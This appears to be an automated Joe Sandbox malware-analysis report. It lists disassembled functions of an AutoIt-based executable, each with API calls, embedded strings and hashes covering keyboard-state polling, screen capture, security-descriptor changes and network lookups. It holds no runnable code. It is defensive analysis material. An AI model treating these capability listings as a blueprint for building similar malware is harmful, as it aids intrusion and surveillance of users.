Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 087f8e5d701b4abea75f6a5aa1522d2354a34f51b34a33db3d5867079f572bc9
Instruction ID: 29b27bf7d9593603611989b532bf58ce3d748e22f19d1d0553fed5e8fc69ed80
Opcode Fuzzy Hash: 087f8e5d701b4abea75f6a5aa1522d2354a34f51b34a33db3d5867079f572bc9
Instruction Fuzzy Hash: CA513B711042059FC708EF20C88596AB7F8FF94718F04895EF89597391EB35EE0ACB92

Function 0083A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0083A47A
__swprintf.LIBCMT ref: 0083A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0083A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0083A4FE
_memset.LIBCMT ref: 0083A51D
_wcsncpy.LIBCMT ref: 0083A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0083A58E
CloseHandle.KERNEL32(00000000), ref: 0083A599
RemoveDirectoryW.KERNEL32(?), ref: 0083A5A2
CloseHandle.KERNEL32(00000000), ref: 0083A5AC

Strings

:, xrefs: 0083A4BD
\??\%s, xrefs: 0083A496
\, xrefs: 0083A4B2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c1b40979b114cbc7d575e7e3c9537365e7458696e9ceb2a74f461eda8dcac33f
Instruction ID: 505b58242af2fc64dbbfd41bab2a3ea6dac4360021bb1b78dc5f33929b4ec729
Opcode Fuzzy Hash: c1b40979b114cbc7d575e7e3c9537365e7458696e9ceb2a74f461eda8dcac33f
Instruction Fuzzy Hash: 9E3190B5500209ABDB219FA0DC49FEB77BCFF88701F1041B6FA08D6161EB7496448B65

Function 0083DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0083DC7B
_wcscat.LIBCMT ref: 0083DC93
_wcscat.LIBCMT ref: 0083DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 0083DCCE
GetFileAttributesW.KERNEL32(?), ref: 0083DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 0083DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 0083DD12

Strings

*.*, xrefs: 0083DD51

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7341dacca3d5871ff91f61323f69c97a525cb852b11204f9212e30d1e57ada7f
Instruction ID: ed73fece3046cf0214bb03e053caaf688354339a86ca37b9d4067b919f6a9da1
Opcode Fuzzy Hash: 7341dacca3d5871ff91f61323f69c97a525cb852b11204f9212e30d1e57ada7f
Instruction Fuzzy Hash: 2481A0725043459FCB20EF24D8859AAB7E8FFC8314F19882EF989C7251E734E945CB92

Function 008283F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
Part of subcall function 0082874A: GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
Part of subcall function 0082874A: GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
Part of subcall function 0082874A: RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Part of subcall function 008287E7: GetProcessHeap.KERNEL32(00000008,00828240,00000000,00000000,?,00828240,?), ref: 008287F3
Part of subcall function 008287E7: RtlAllocateHeap.NTDLL(00000000,?,00828240), ref: 008287FA
Part of subcall function 008287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00828240,?), ref: 0082880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00828458
_memset.LIBCMT ref: 0082846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0082848C
GetLengthSid.ADVAPI32(?), ref: 0082849D
GetAce.ADVAPI32(?,00000000,?), ref: 008284DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008284F6
GetLengthSid.ADVAPI32(?), ref: 00828513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00828522
RtlAllocateHeap.NTDLL(00000000), ref: 00828529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0082854A
CopySid.ADVAPI32(00000000), ref: 00828551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00828582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008285A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008285BC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 1af78bb7289d63e1c292a9ec64c2319ac1ecb69b5f9457e44c7d415ddf4a3956
Instruction ID: 3d5fef4c25dfb77e3e606c3b56145301809a0c9d69fcd6053b6d96aa554dabb3
Opcode Fuzzy Hash: 1af78bb7289d63e1c292a9ec64c2319ac1ecb69b5f9457e44c7d415ddf4a3956
Instruction Fuzzy Hash: C4615971901219EFDF00DFA4ED44AAEBBB9FF04301F088169E915E7291DB389A44CF60

Function 0084762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008476A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008476AE
CreateCompatibleDC.GDI32(?), ref: 008476BA
SelectObject.GDI32(00000000,?), ref: 008476C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0084771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00847757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0084777B
SelectObject.GDI32(00000006,?), ref: 00847783
DeleteObject.GDI32(?), ref: 0084778C
DeleteDC.GDI32(00000006), ref: 00847793
ReleaseDC.USER32(00000000,?), ref: 0084779E

Strings

(, xrefs: 00847723

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: c3e5374782fc72e683b399eb005ccf3ce0ce3818ce5dcb22d4ba0dc2109e5b3a
Instruction ID: a92fbbcc3a6a0718aad1642ddeeaacc760fe42165c5b8e670150cbce07cec1ae
Opcode Fuzzy Hash: c3e5374782fc72e683b399eb005ccf3ce0ce3818ce5dcb22d4ba0dc2109e5b3a
Instruction Fuzzy Hash: D6514875904709EFCB15CFA8CC84EAEBBB9FF48310F14852DFA4A97251D735A8408B60

Function 0083A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0085FB78), ref: 0083A0FC

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0083A11E
__swprintf.LIBCMT ref: 0083A177
__swprintf.LIBCMT ref: 0083A190
_wprintf.LIBCMT ref: 0083A246
_wprintf.LIBCMT ref: 0083A264

Strings

"%s" (%d) : ==> %s:, xrefs: 0083A25F
Line %d (File "%s"):, xrefs: 0083A171, 0083A18A
Error: , xrefs: 0083A20E
"%s" (%d) : ==> %s:%s%s, xrefs: 0083A241
^ ERROR, xrefs: 0083A1E8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 6221cac31c44e4c0ef1115a73232303c4f6df26932ca94cc71eebde85627ca89
Instruction ID: 712000429f1c3aaca87697bcc1b12c668caea053fc9789021efb09cc3f59970f
Opcode Fuzzy Hash: 6221cac31c44e4c0ef1115a73232303c4f6df26932ca94cc71eebde85627ca89
Instruction Fuzzy Hash: CA514E71900119AACB19EBE0CD4AEEEB779FF04300F144166B515B22A1EB396E58DBA1

Function 007D6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 007F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007D6C6C,?,00008000), ref: 007F0BB7

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 007D6E5A

Part of subcall function 007D59CD: _wcscpy.LIBCMT ref: 007D5A05

Part of subcall function 007F387D: _iswctype.LIBCMT ref: 007F3885

Strings

EA06, xrefs: 0080E87B
Bad directive syntax error, xrefs: 0080EBC6
Unterminated string, xrefs: 0080EC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0080E84A
>>>AUTOIT SCRIPT<<<, xrefs: 0080E8BF
AU3!, xrefs: 007D6CC1
Error opening the file, xrefs: 0080E866, 0080E8E1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: ccff18a33571d8c1eb7eb6f1185b1aae99b5973b9cd7a516be2d3fbde5155b38
Instruction ID: c78f600fab14824a7f62c1ba7b353de1ec78fef19efce12e4ddc5275d141d1c1
Opcode Fuzzy Hash: ccff18a33571d8c1eb7eb6f1185b1aae99b5973b9cd7a516be2d3fbde5155b38
Instruction Fuzzy Hash: B2025571108341DFC724EF24C895AAFBBF5FF98314F04492EF586972A2DA389949CB52

Function 007D45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D45F9
GetMenuItemCount.USER32(00896890), ref: 0080D7CD
GetMenuItemCount.USER32(00896890), ref: 0080D87D
GetCursorPos.USER32(?), ref: 0080D8C1
SetForegroundWindow.USER32(00000000), ref: 0080D8CA
TrackPopupMenuEx.USER32(00896890,00000000,?,00000000,00000000,00000000), ref: 0080D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0080D8E9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 6725dfcb302241b6794be4a01956d2c2eba634c68bfd91a164967d281e0d1565
Instruction ID: a864521fa7bed51a528914e45659189405a1da57d97439532a880ff8b423b295
Opcode Fuzzy Hash: 6725dfcb302241b6794be4a01956d2c2eba634c68bfd91a164967d281e0d1565
Instruction Fuzzy Hash: 5F712970601305BFEB209F54DC89FAABF64FF05368F104216F615E62D1D7B59810DB91

Function 008510A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

Strings

HKLM, xrefs: 0085113A
HKCR, xrefs: 00851164
HKCC, xrefs: 0085118A
HKEY_CURRENT_USER, xrefs: 0085119B
HKEY_LOCAL_MACHINE, xrefs: 00851125
HKEY_CURRENT_CONFIG, xrefs: 00851179
HKU, xrefs: 008511CE
HKCU, xrefs: 008511AC
HKEY_CLASSES_ROOT, xrefs: 0085114F
HKEY_USERS, xrefs: 008511BD

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 53fc976d7fd16993f0a4e1dd5984fa393c2bdbb976d275f59aa847d317a11d24
Instruction ID: fb340d6a3faf5075cb25e8e37185b34b0ab934e00b361e49e02872976cf494de
Opcode Fuzzy Hash: 53fc976d7fd16993f0a4e1dd5984fa393c2bdbb976d275f59aa847d317a11d24
Instruction Fuzzy Hash: FA413E3025024ECBCF20EFA0D999AEA3724FF56341F504555EE919B392DB34AD1ECBA0

Function 00835569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 007D7A84: _memmove.LIBCMT ref: 007D7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008355D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008355E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008355F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083561C

Strings

status PlayMe mode, xrefs: 008355CD
play PlayMe, xrefs: 00835617
open , xrefs: 00835581
close PlayMe, xrefs: 008355E3, 00835610
play PlayMe wait, xrefs: 00835606
alias PlayMe, xrefs: 008355AB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: d569316cca6b870c53d0f30dda91835578a9d9c8641fecd8efcc24b1557cfcc6
Instruction ID: e8abbf56b9f6d1d8edfedcfa51383ccdc96cf2e58e69ce4a3f4f9f8b6e95d3e3
Opcode Fuzzy Hash: d569316cca6b870c53d0f30dda91835578a9d9c8641fecd8efcc24b1557cfcc6
Instruction Fuzzy Hash: AE113021650569B9E728B6A5CC4ADFFBB7CFFD5B00F40046BB411E22D1EA681E05C7A1

Function 008348F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 0083490E
gethostname.WS2_32(?,00000100), ref: 00834928
gethostbyname.WS2_32(?), ref: 00834935
_wcscpy.LIBCMT ref: 0083495D
_memmove.LIBCMT ref: 00834970
inet_ntoa.WS2_32(?), ref: 0083497B
_strcat.LIBCMT ref: 00834989
_wcscpy.LIBCMT ref: 008349A0
WSACleanup.WS2_32 ref: 008349AE
_wcscpy.LIBCMT ref: 008349BC

Strings

0.0.0.0, xrefs: 00834957

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 9ba7ea623a566a50b092ee5b9cf0365018019493ee7407b07f4756b86c2fe486
Instruction ID: 49e5a320afb5420d1dea538b1d3bbf99ff29b09031206df5852b7348cc7e2b37
Opcode Fuzzy Hash: 9ba7ea623a566a50b092ee5b9cf0365018019493ee7407b07f4756b86c2fe486
Instruction Fuzzy Hash: A411D831914118EBCB24EB24AC4AFEB7BACFB44711F040175FA04D62A2EF799A858691

Function 00835217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0083521C

Part of subcall function 007F0719: timeGetTime.WINMM(?,75A4B400,007E0FF9), ref: 007F071D

Sleep.KERNEL32(0000000A), ref: 00835248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0083526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0083528E
SetActiveWindow.USER32 ref: 008352AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008352BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 008352DA
Sleep.KERNEL32(000000FA), ref: 008352E5
IsWindow.USER32 ref: 008352F1
EndDialog.USER32(00000000), ref: 00835302

Strings

BUTTON, xrefs: 00835280

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 25009d837435fcd9e013d5bfa985d523f570293f5a270017563d3235bc70db5d
Instruction ID: e1b5ad0a8cd3972e796c87abce033f433a6d177f6051abfa78dd6785f5cdeb31
Opcode Fuzzy Hash: 25009d837435fcd9e013d5bfa985d523f570293f5a270017563d3235bc70db5d
Instruction Fuzzy Hash: 81219670244704AFE7017B70ED89A263B69FB96347F091435F602C22B2DB659C54C7A2

Function 0083052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008305A7
SetKeyboardState.USER32(?), ref: 00830612
GetAsyncKeyState.USER32(000000A0), ref: 00830632
GetKeyState.USER32(000000A0), ref: 00830649
GetAsyncKeyState.USER32(000000A1), ref: 00830678
GetKeyState.USER32(000000A1), ref: 00830689
GetAsyncKeyState.USER32(00000011), ref: 008306B5
GetKeyState.USER32(00000011), ref: 008306C3
GetAsyncKeyState.USER32(00000012), ref: 008306EC
GetKeyState.USER32(00000012), ref: 008306FA
GetAsyncKeyState.USER32(0000005B), ref: 00830723
GetKeyState.USER32(0000005B), ref: 00830731

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
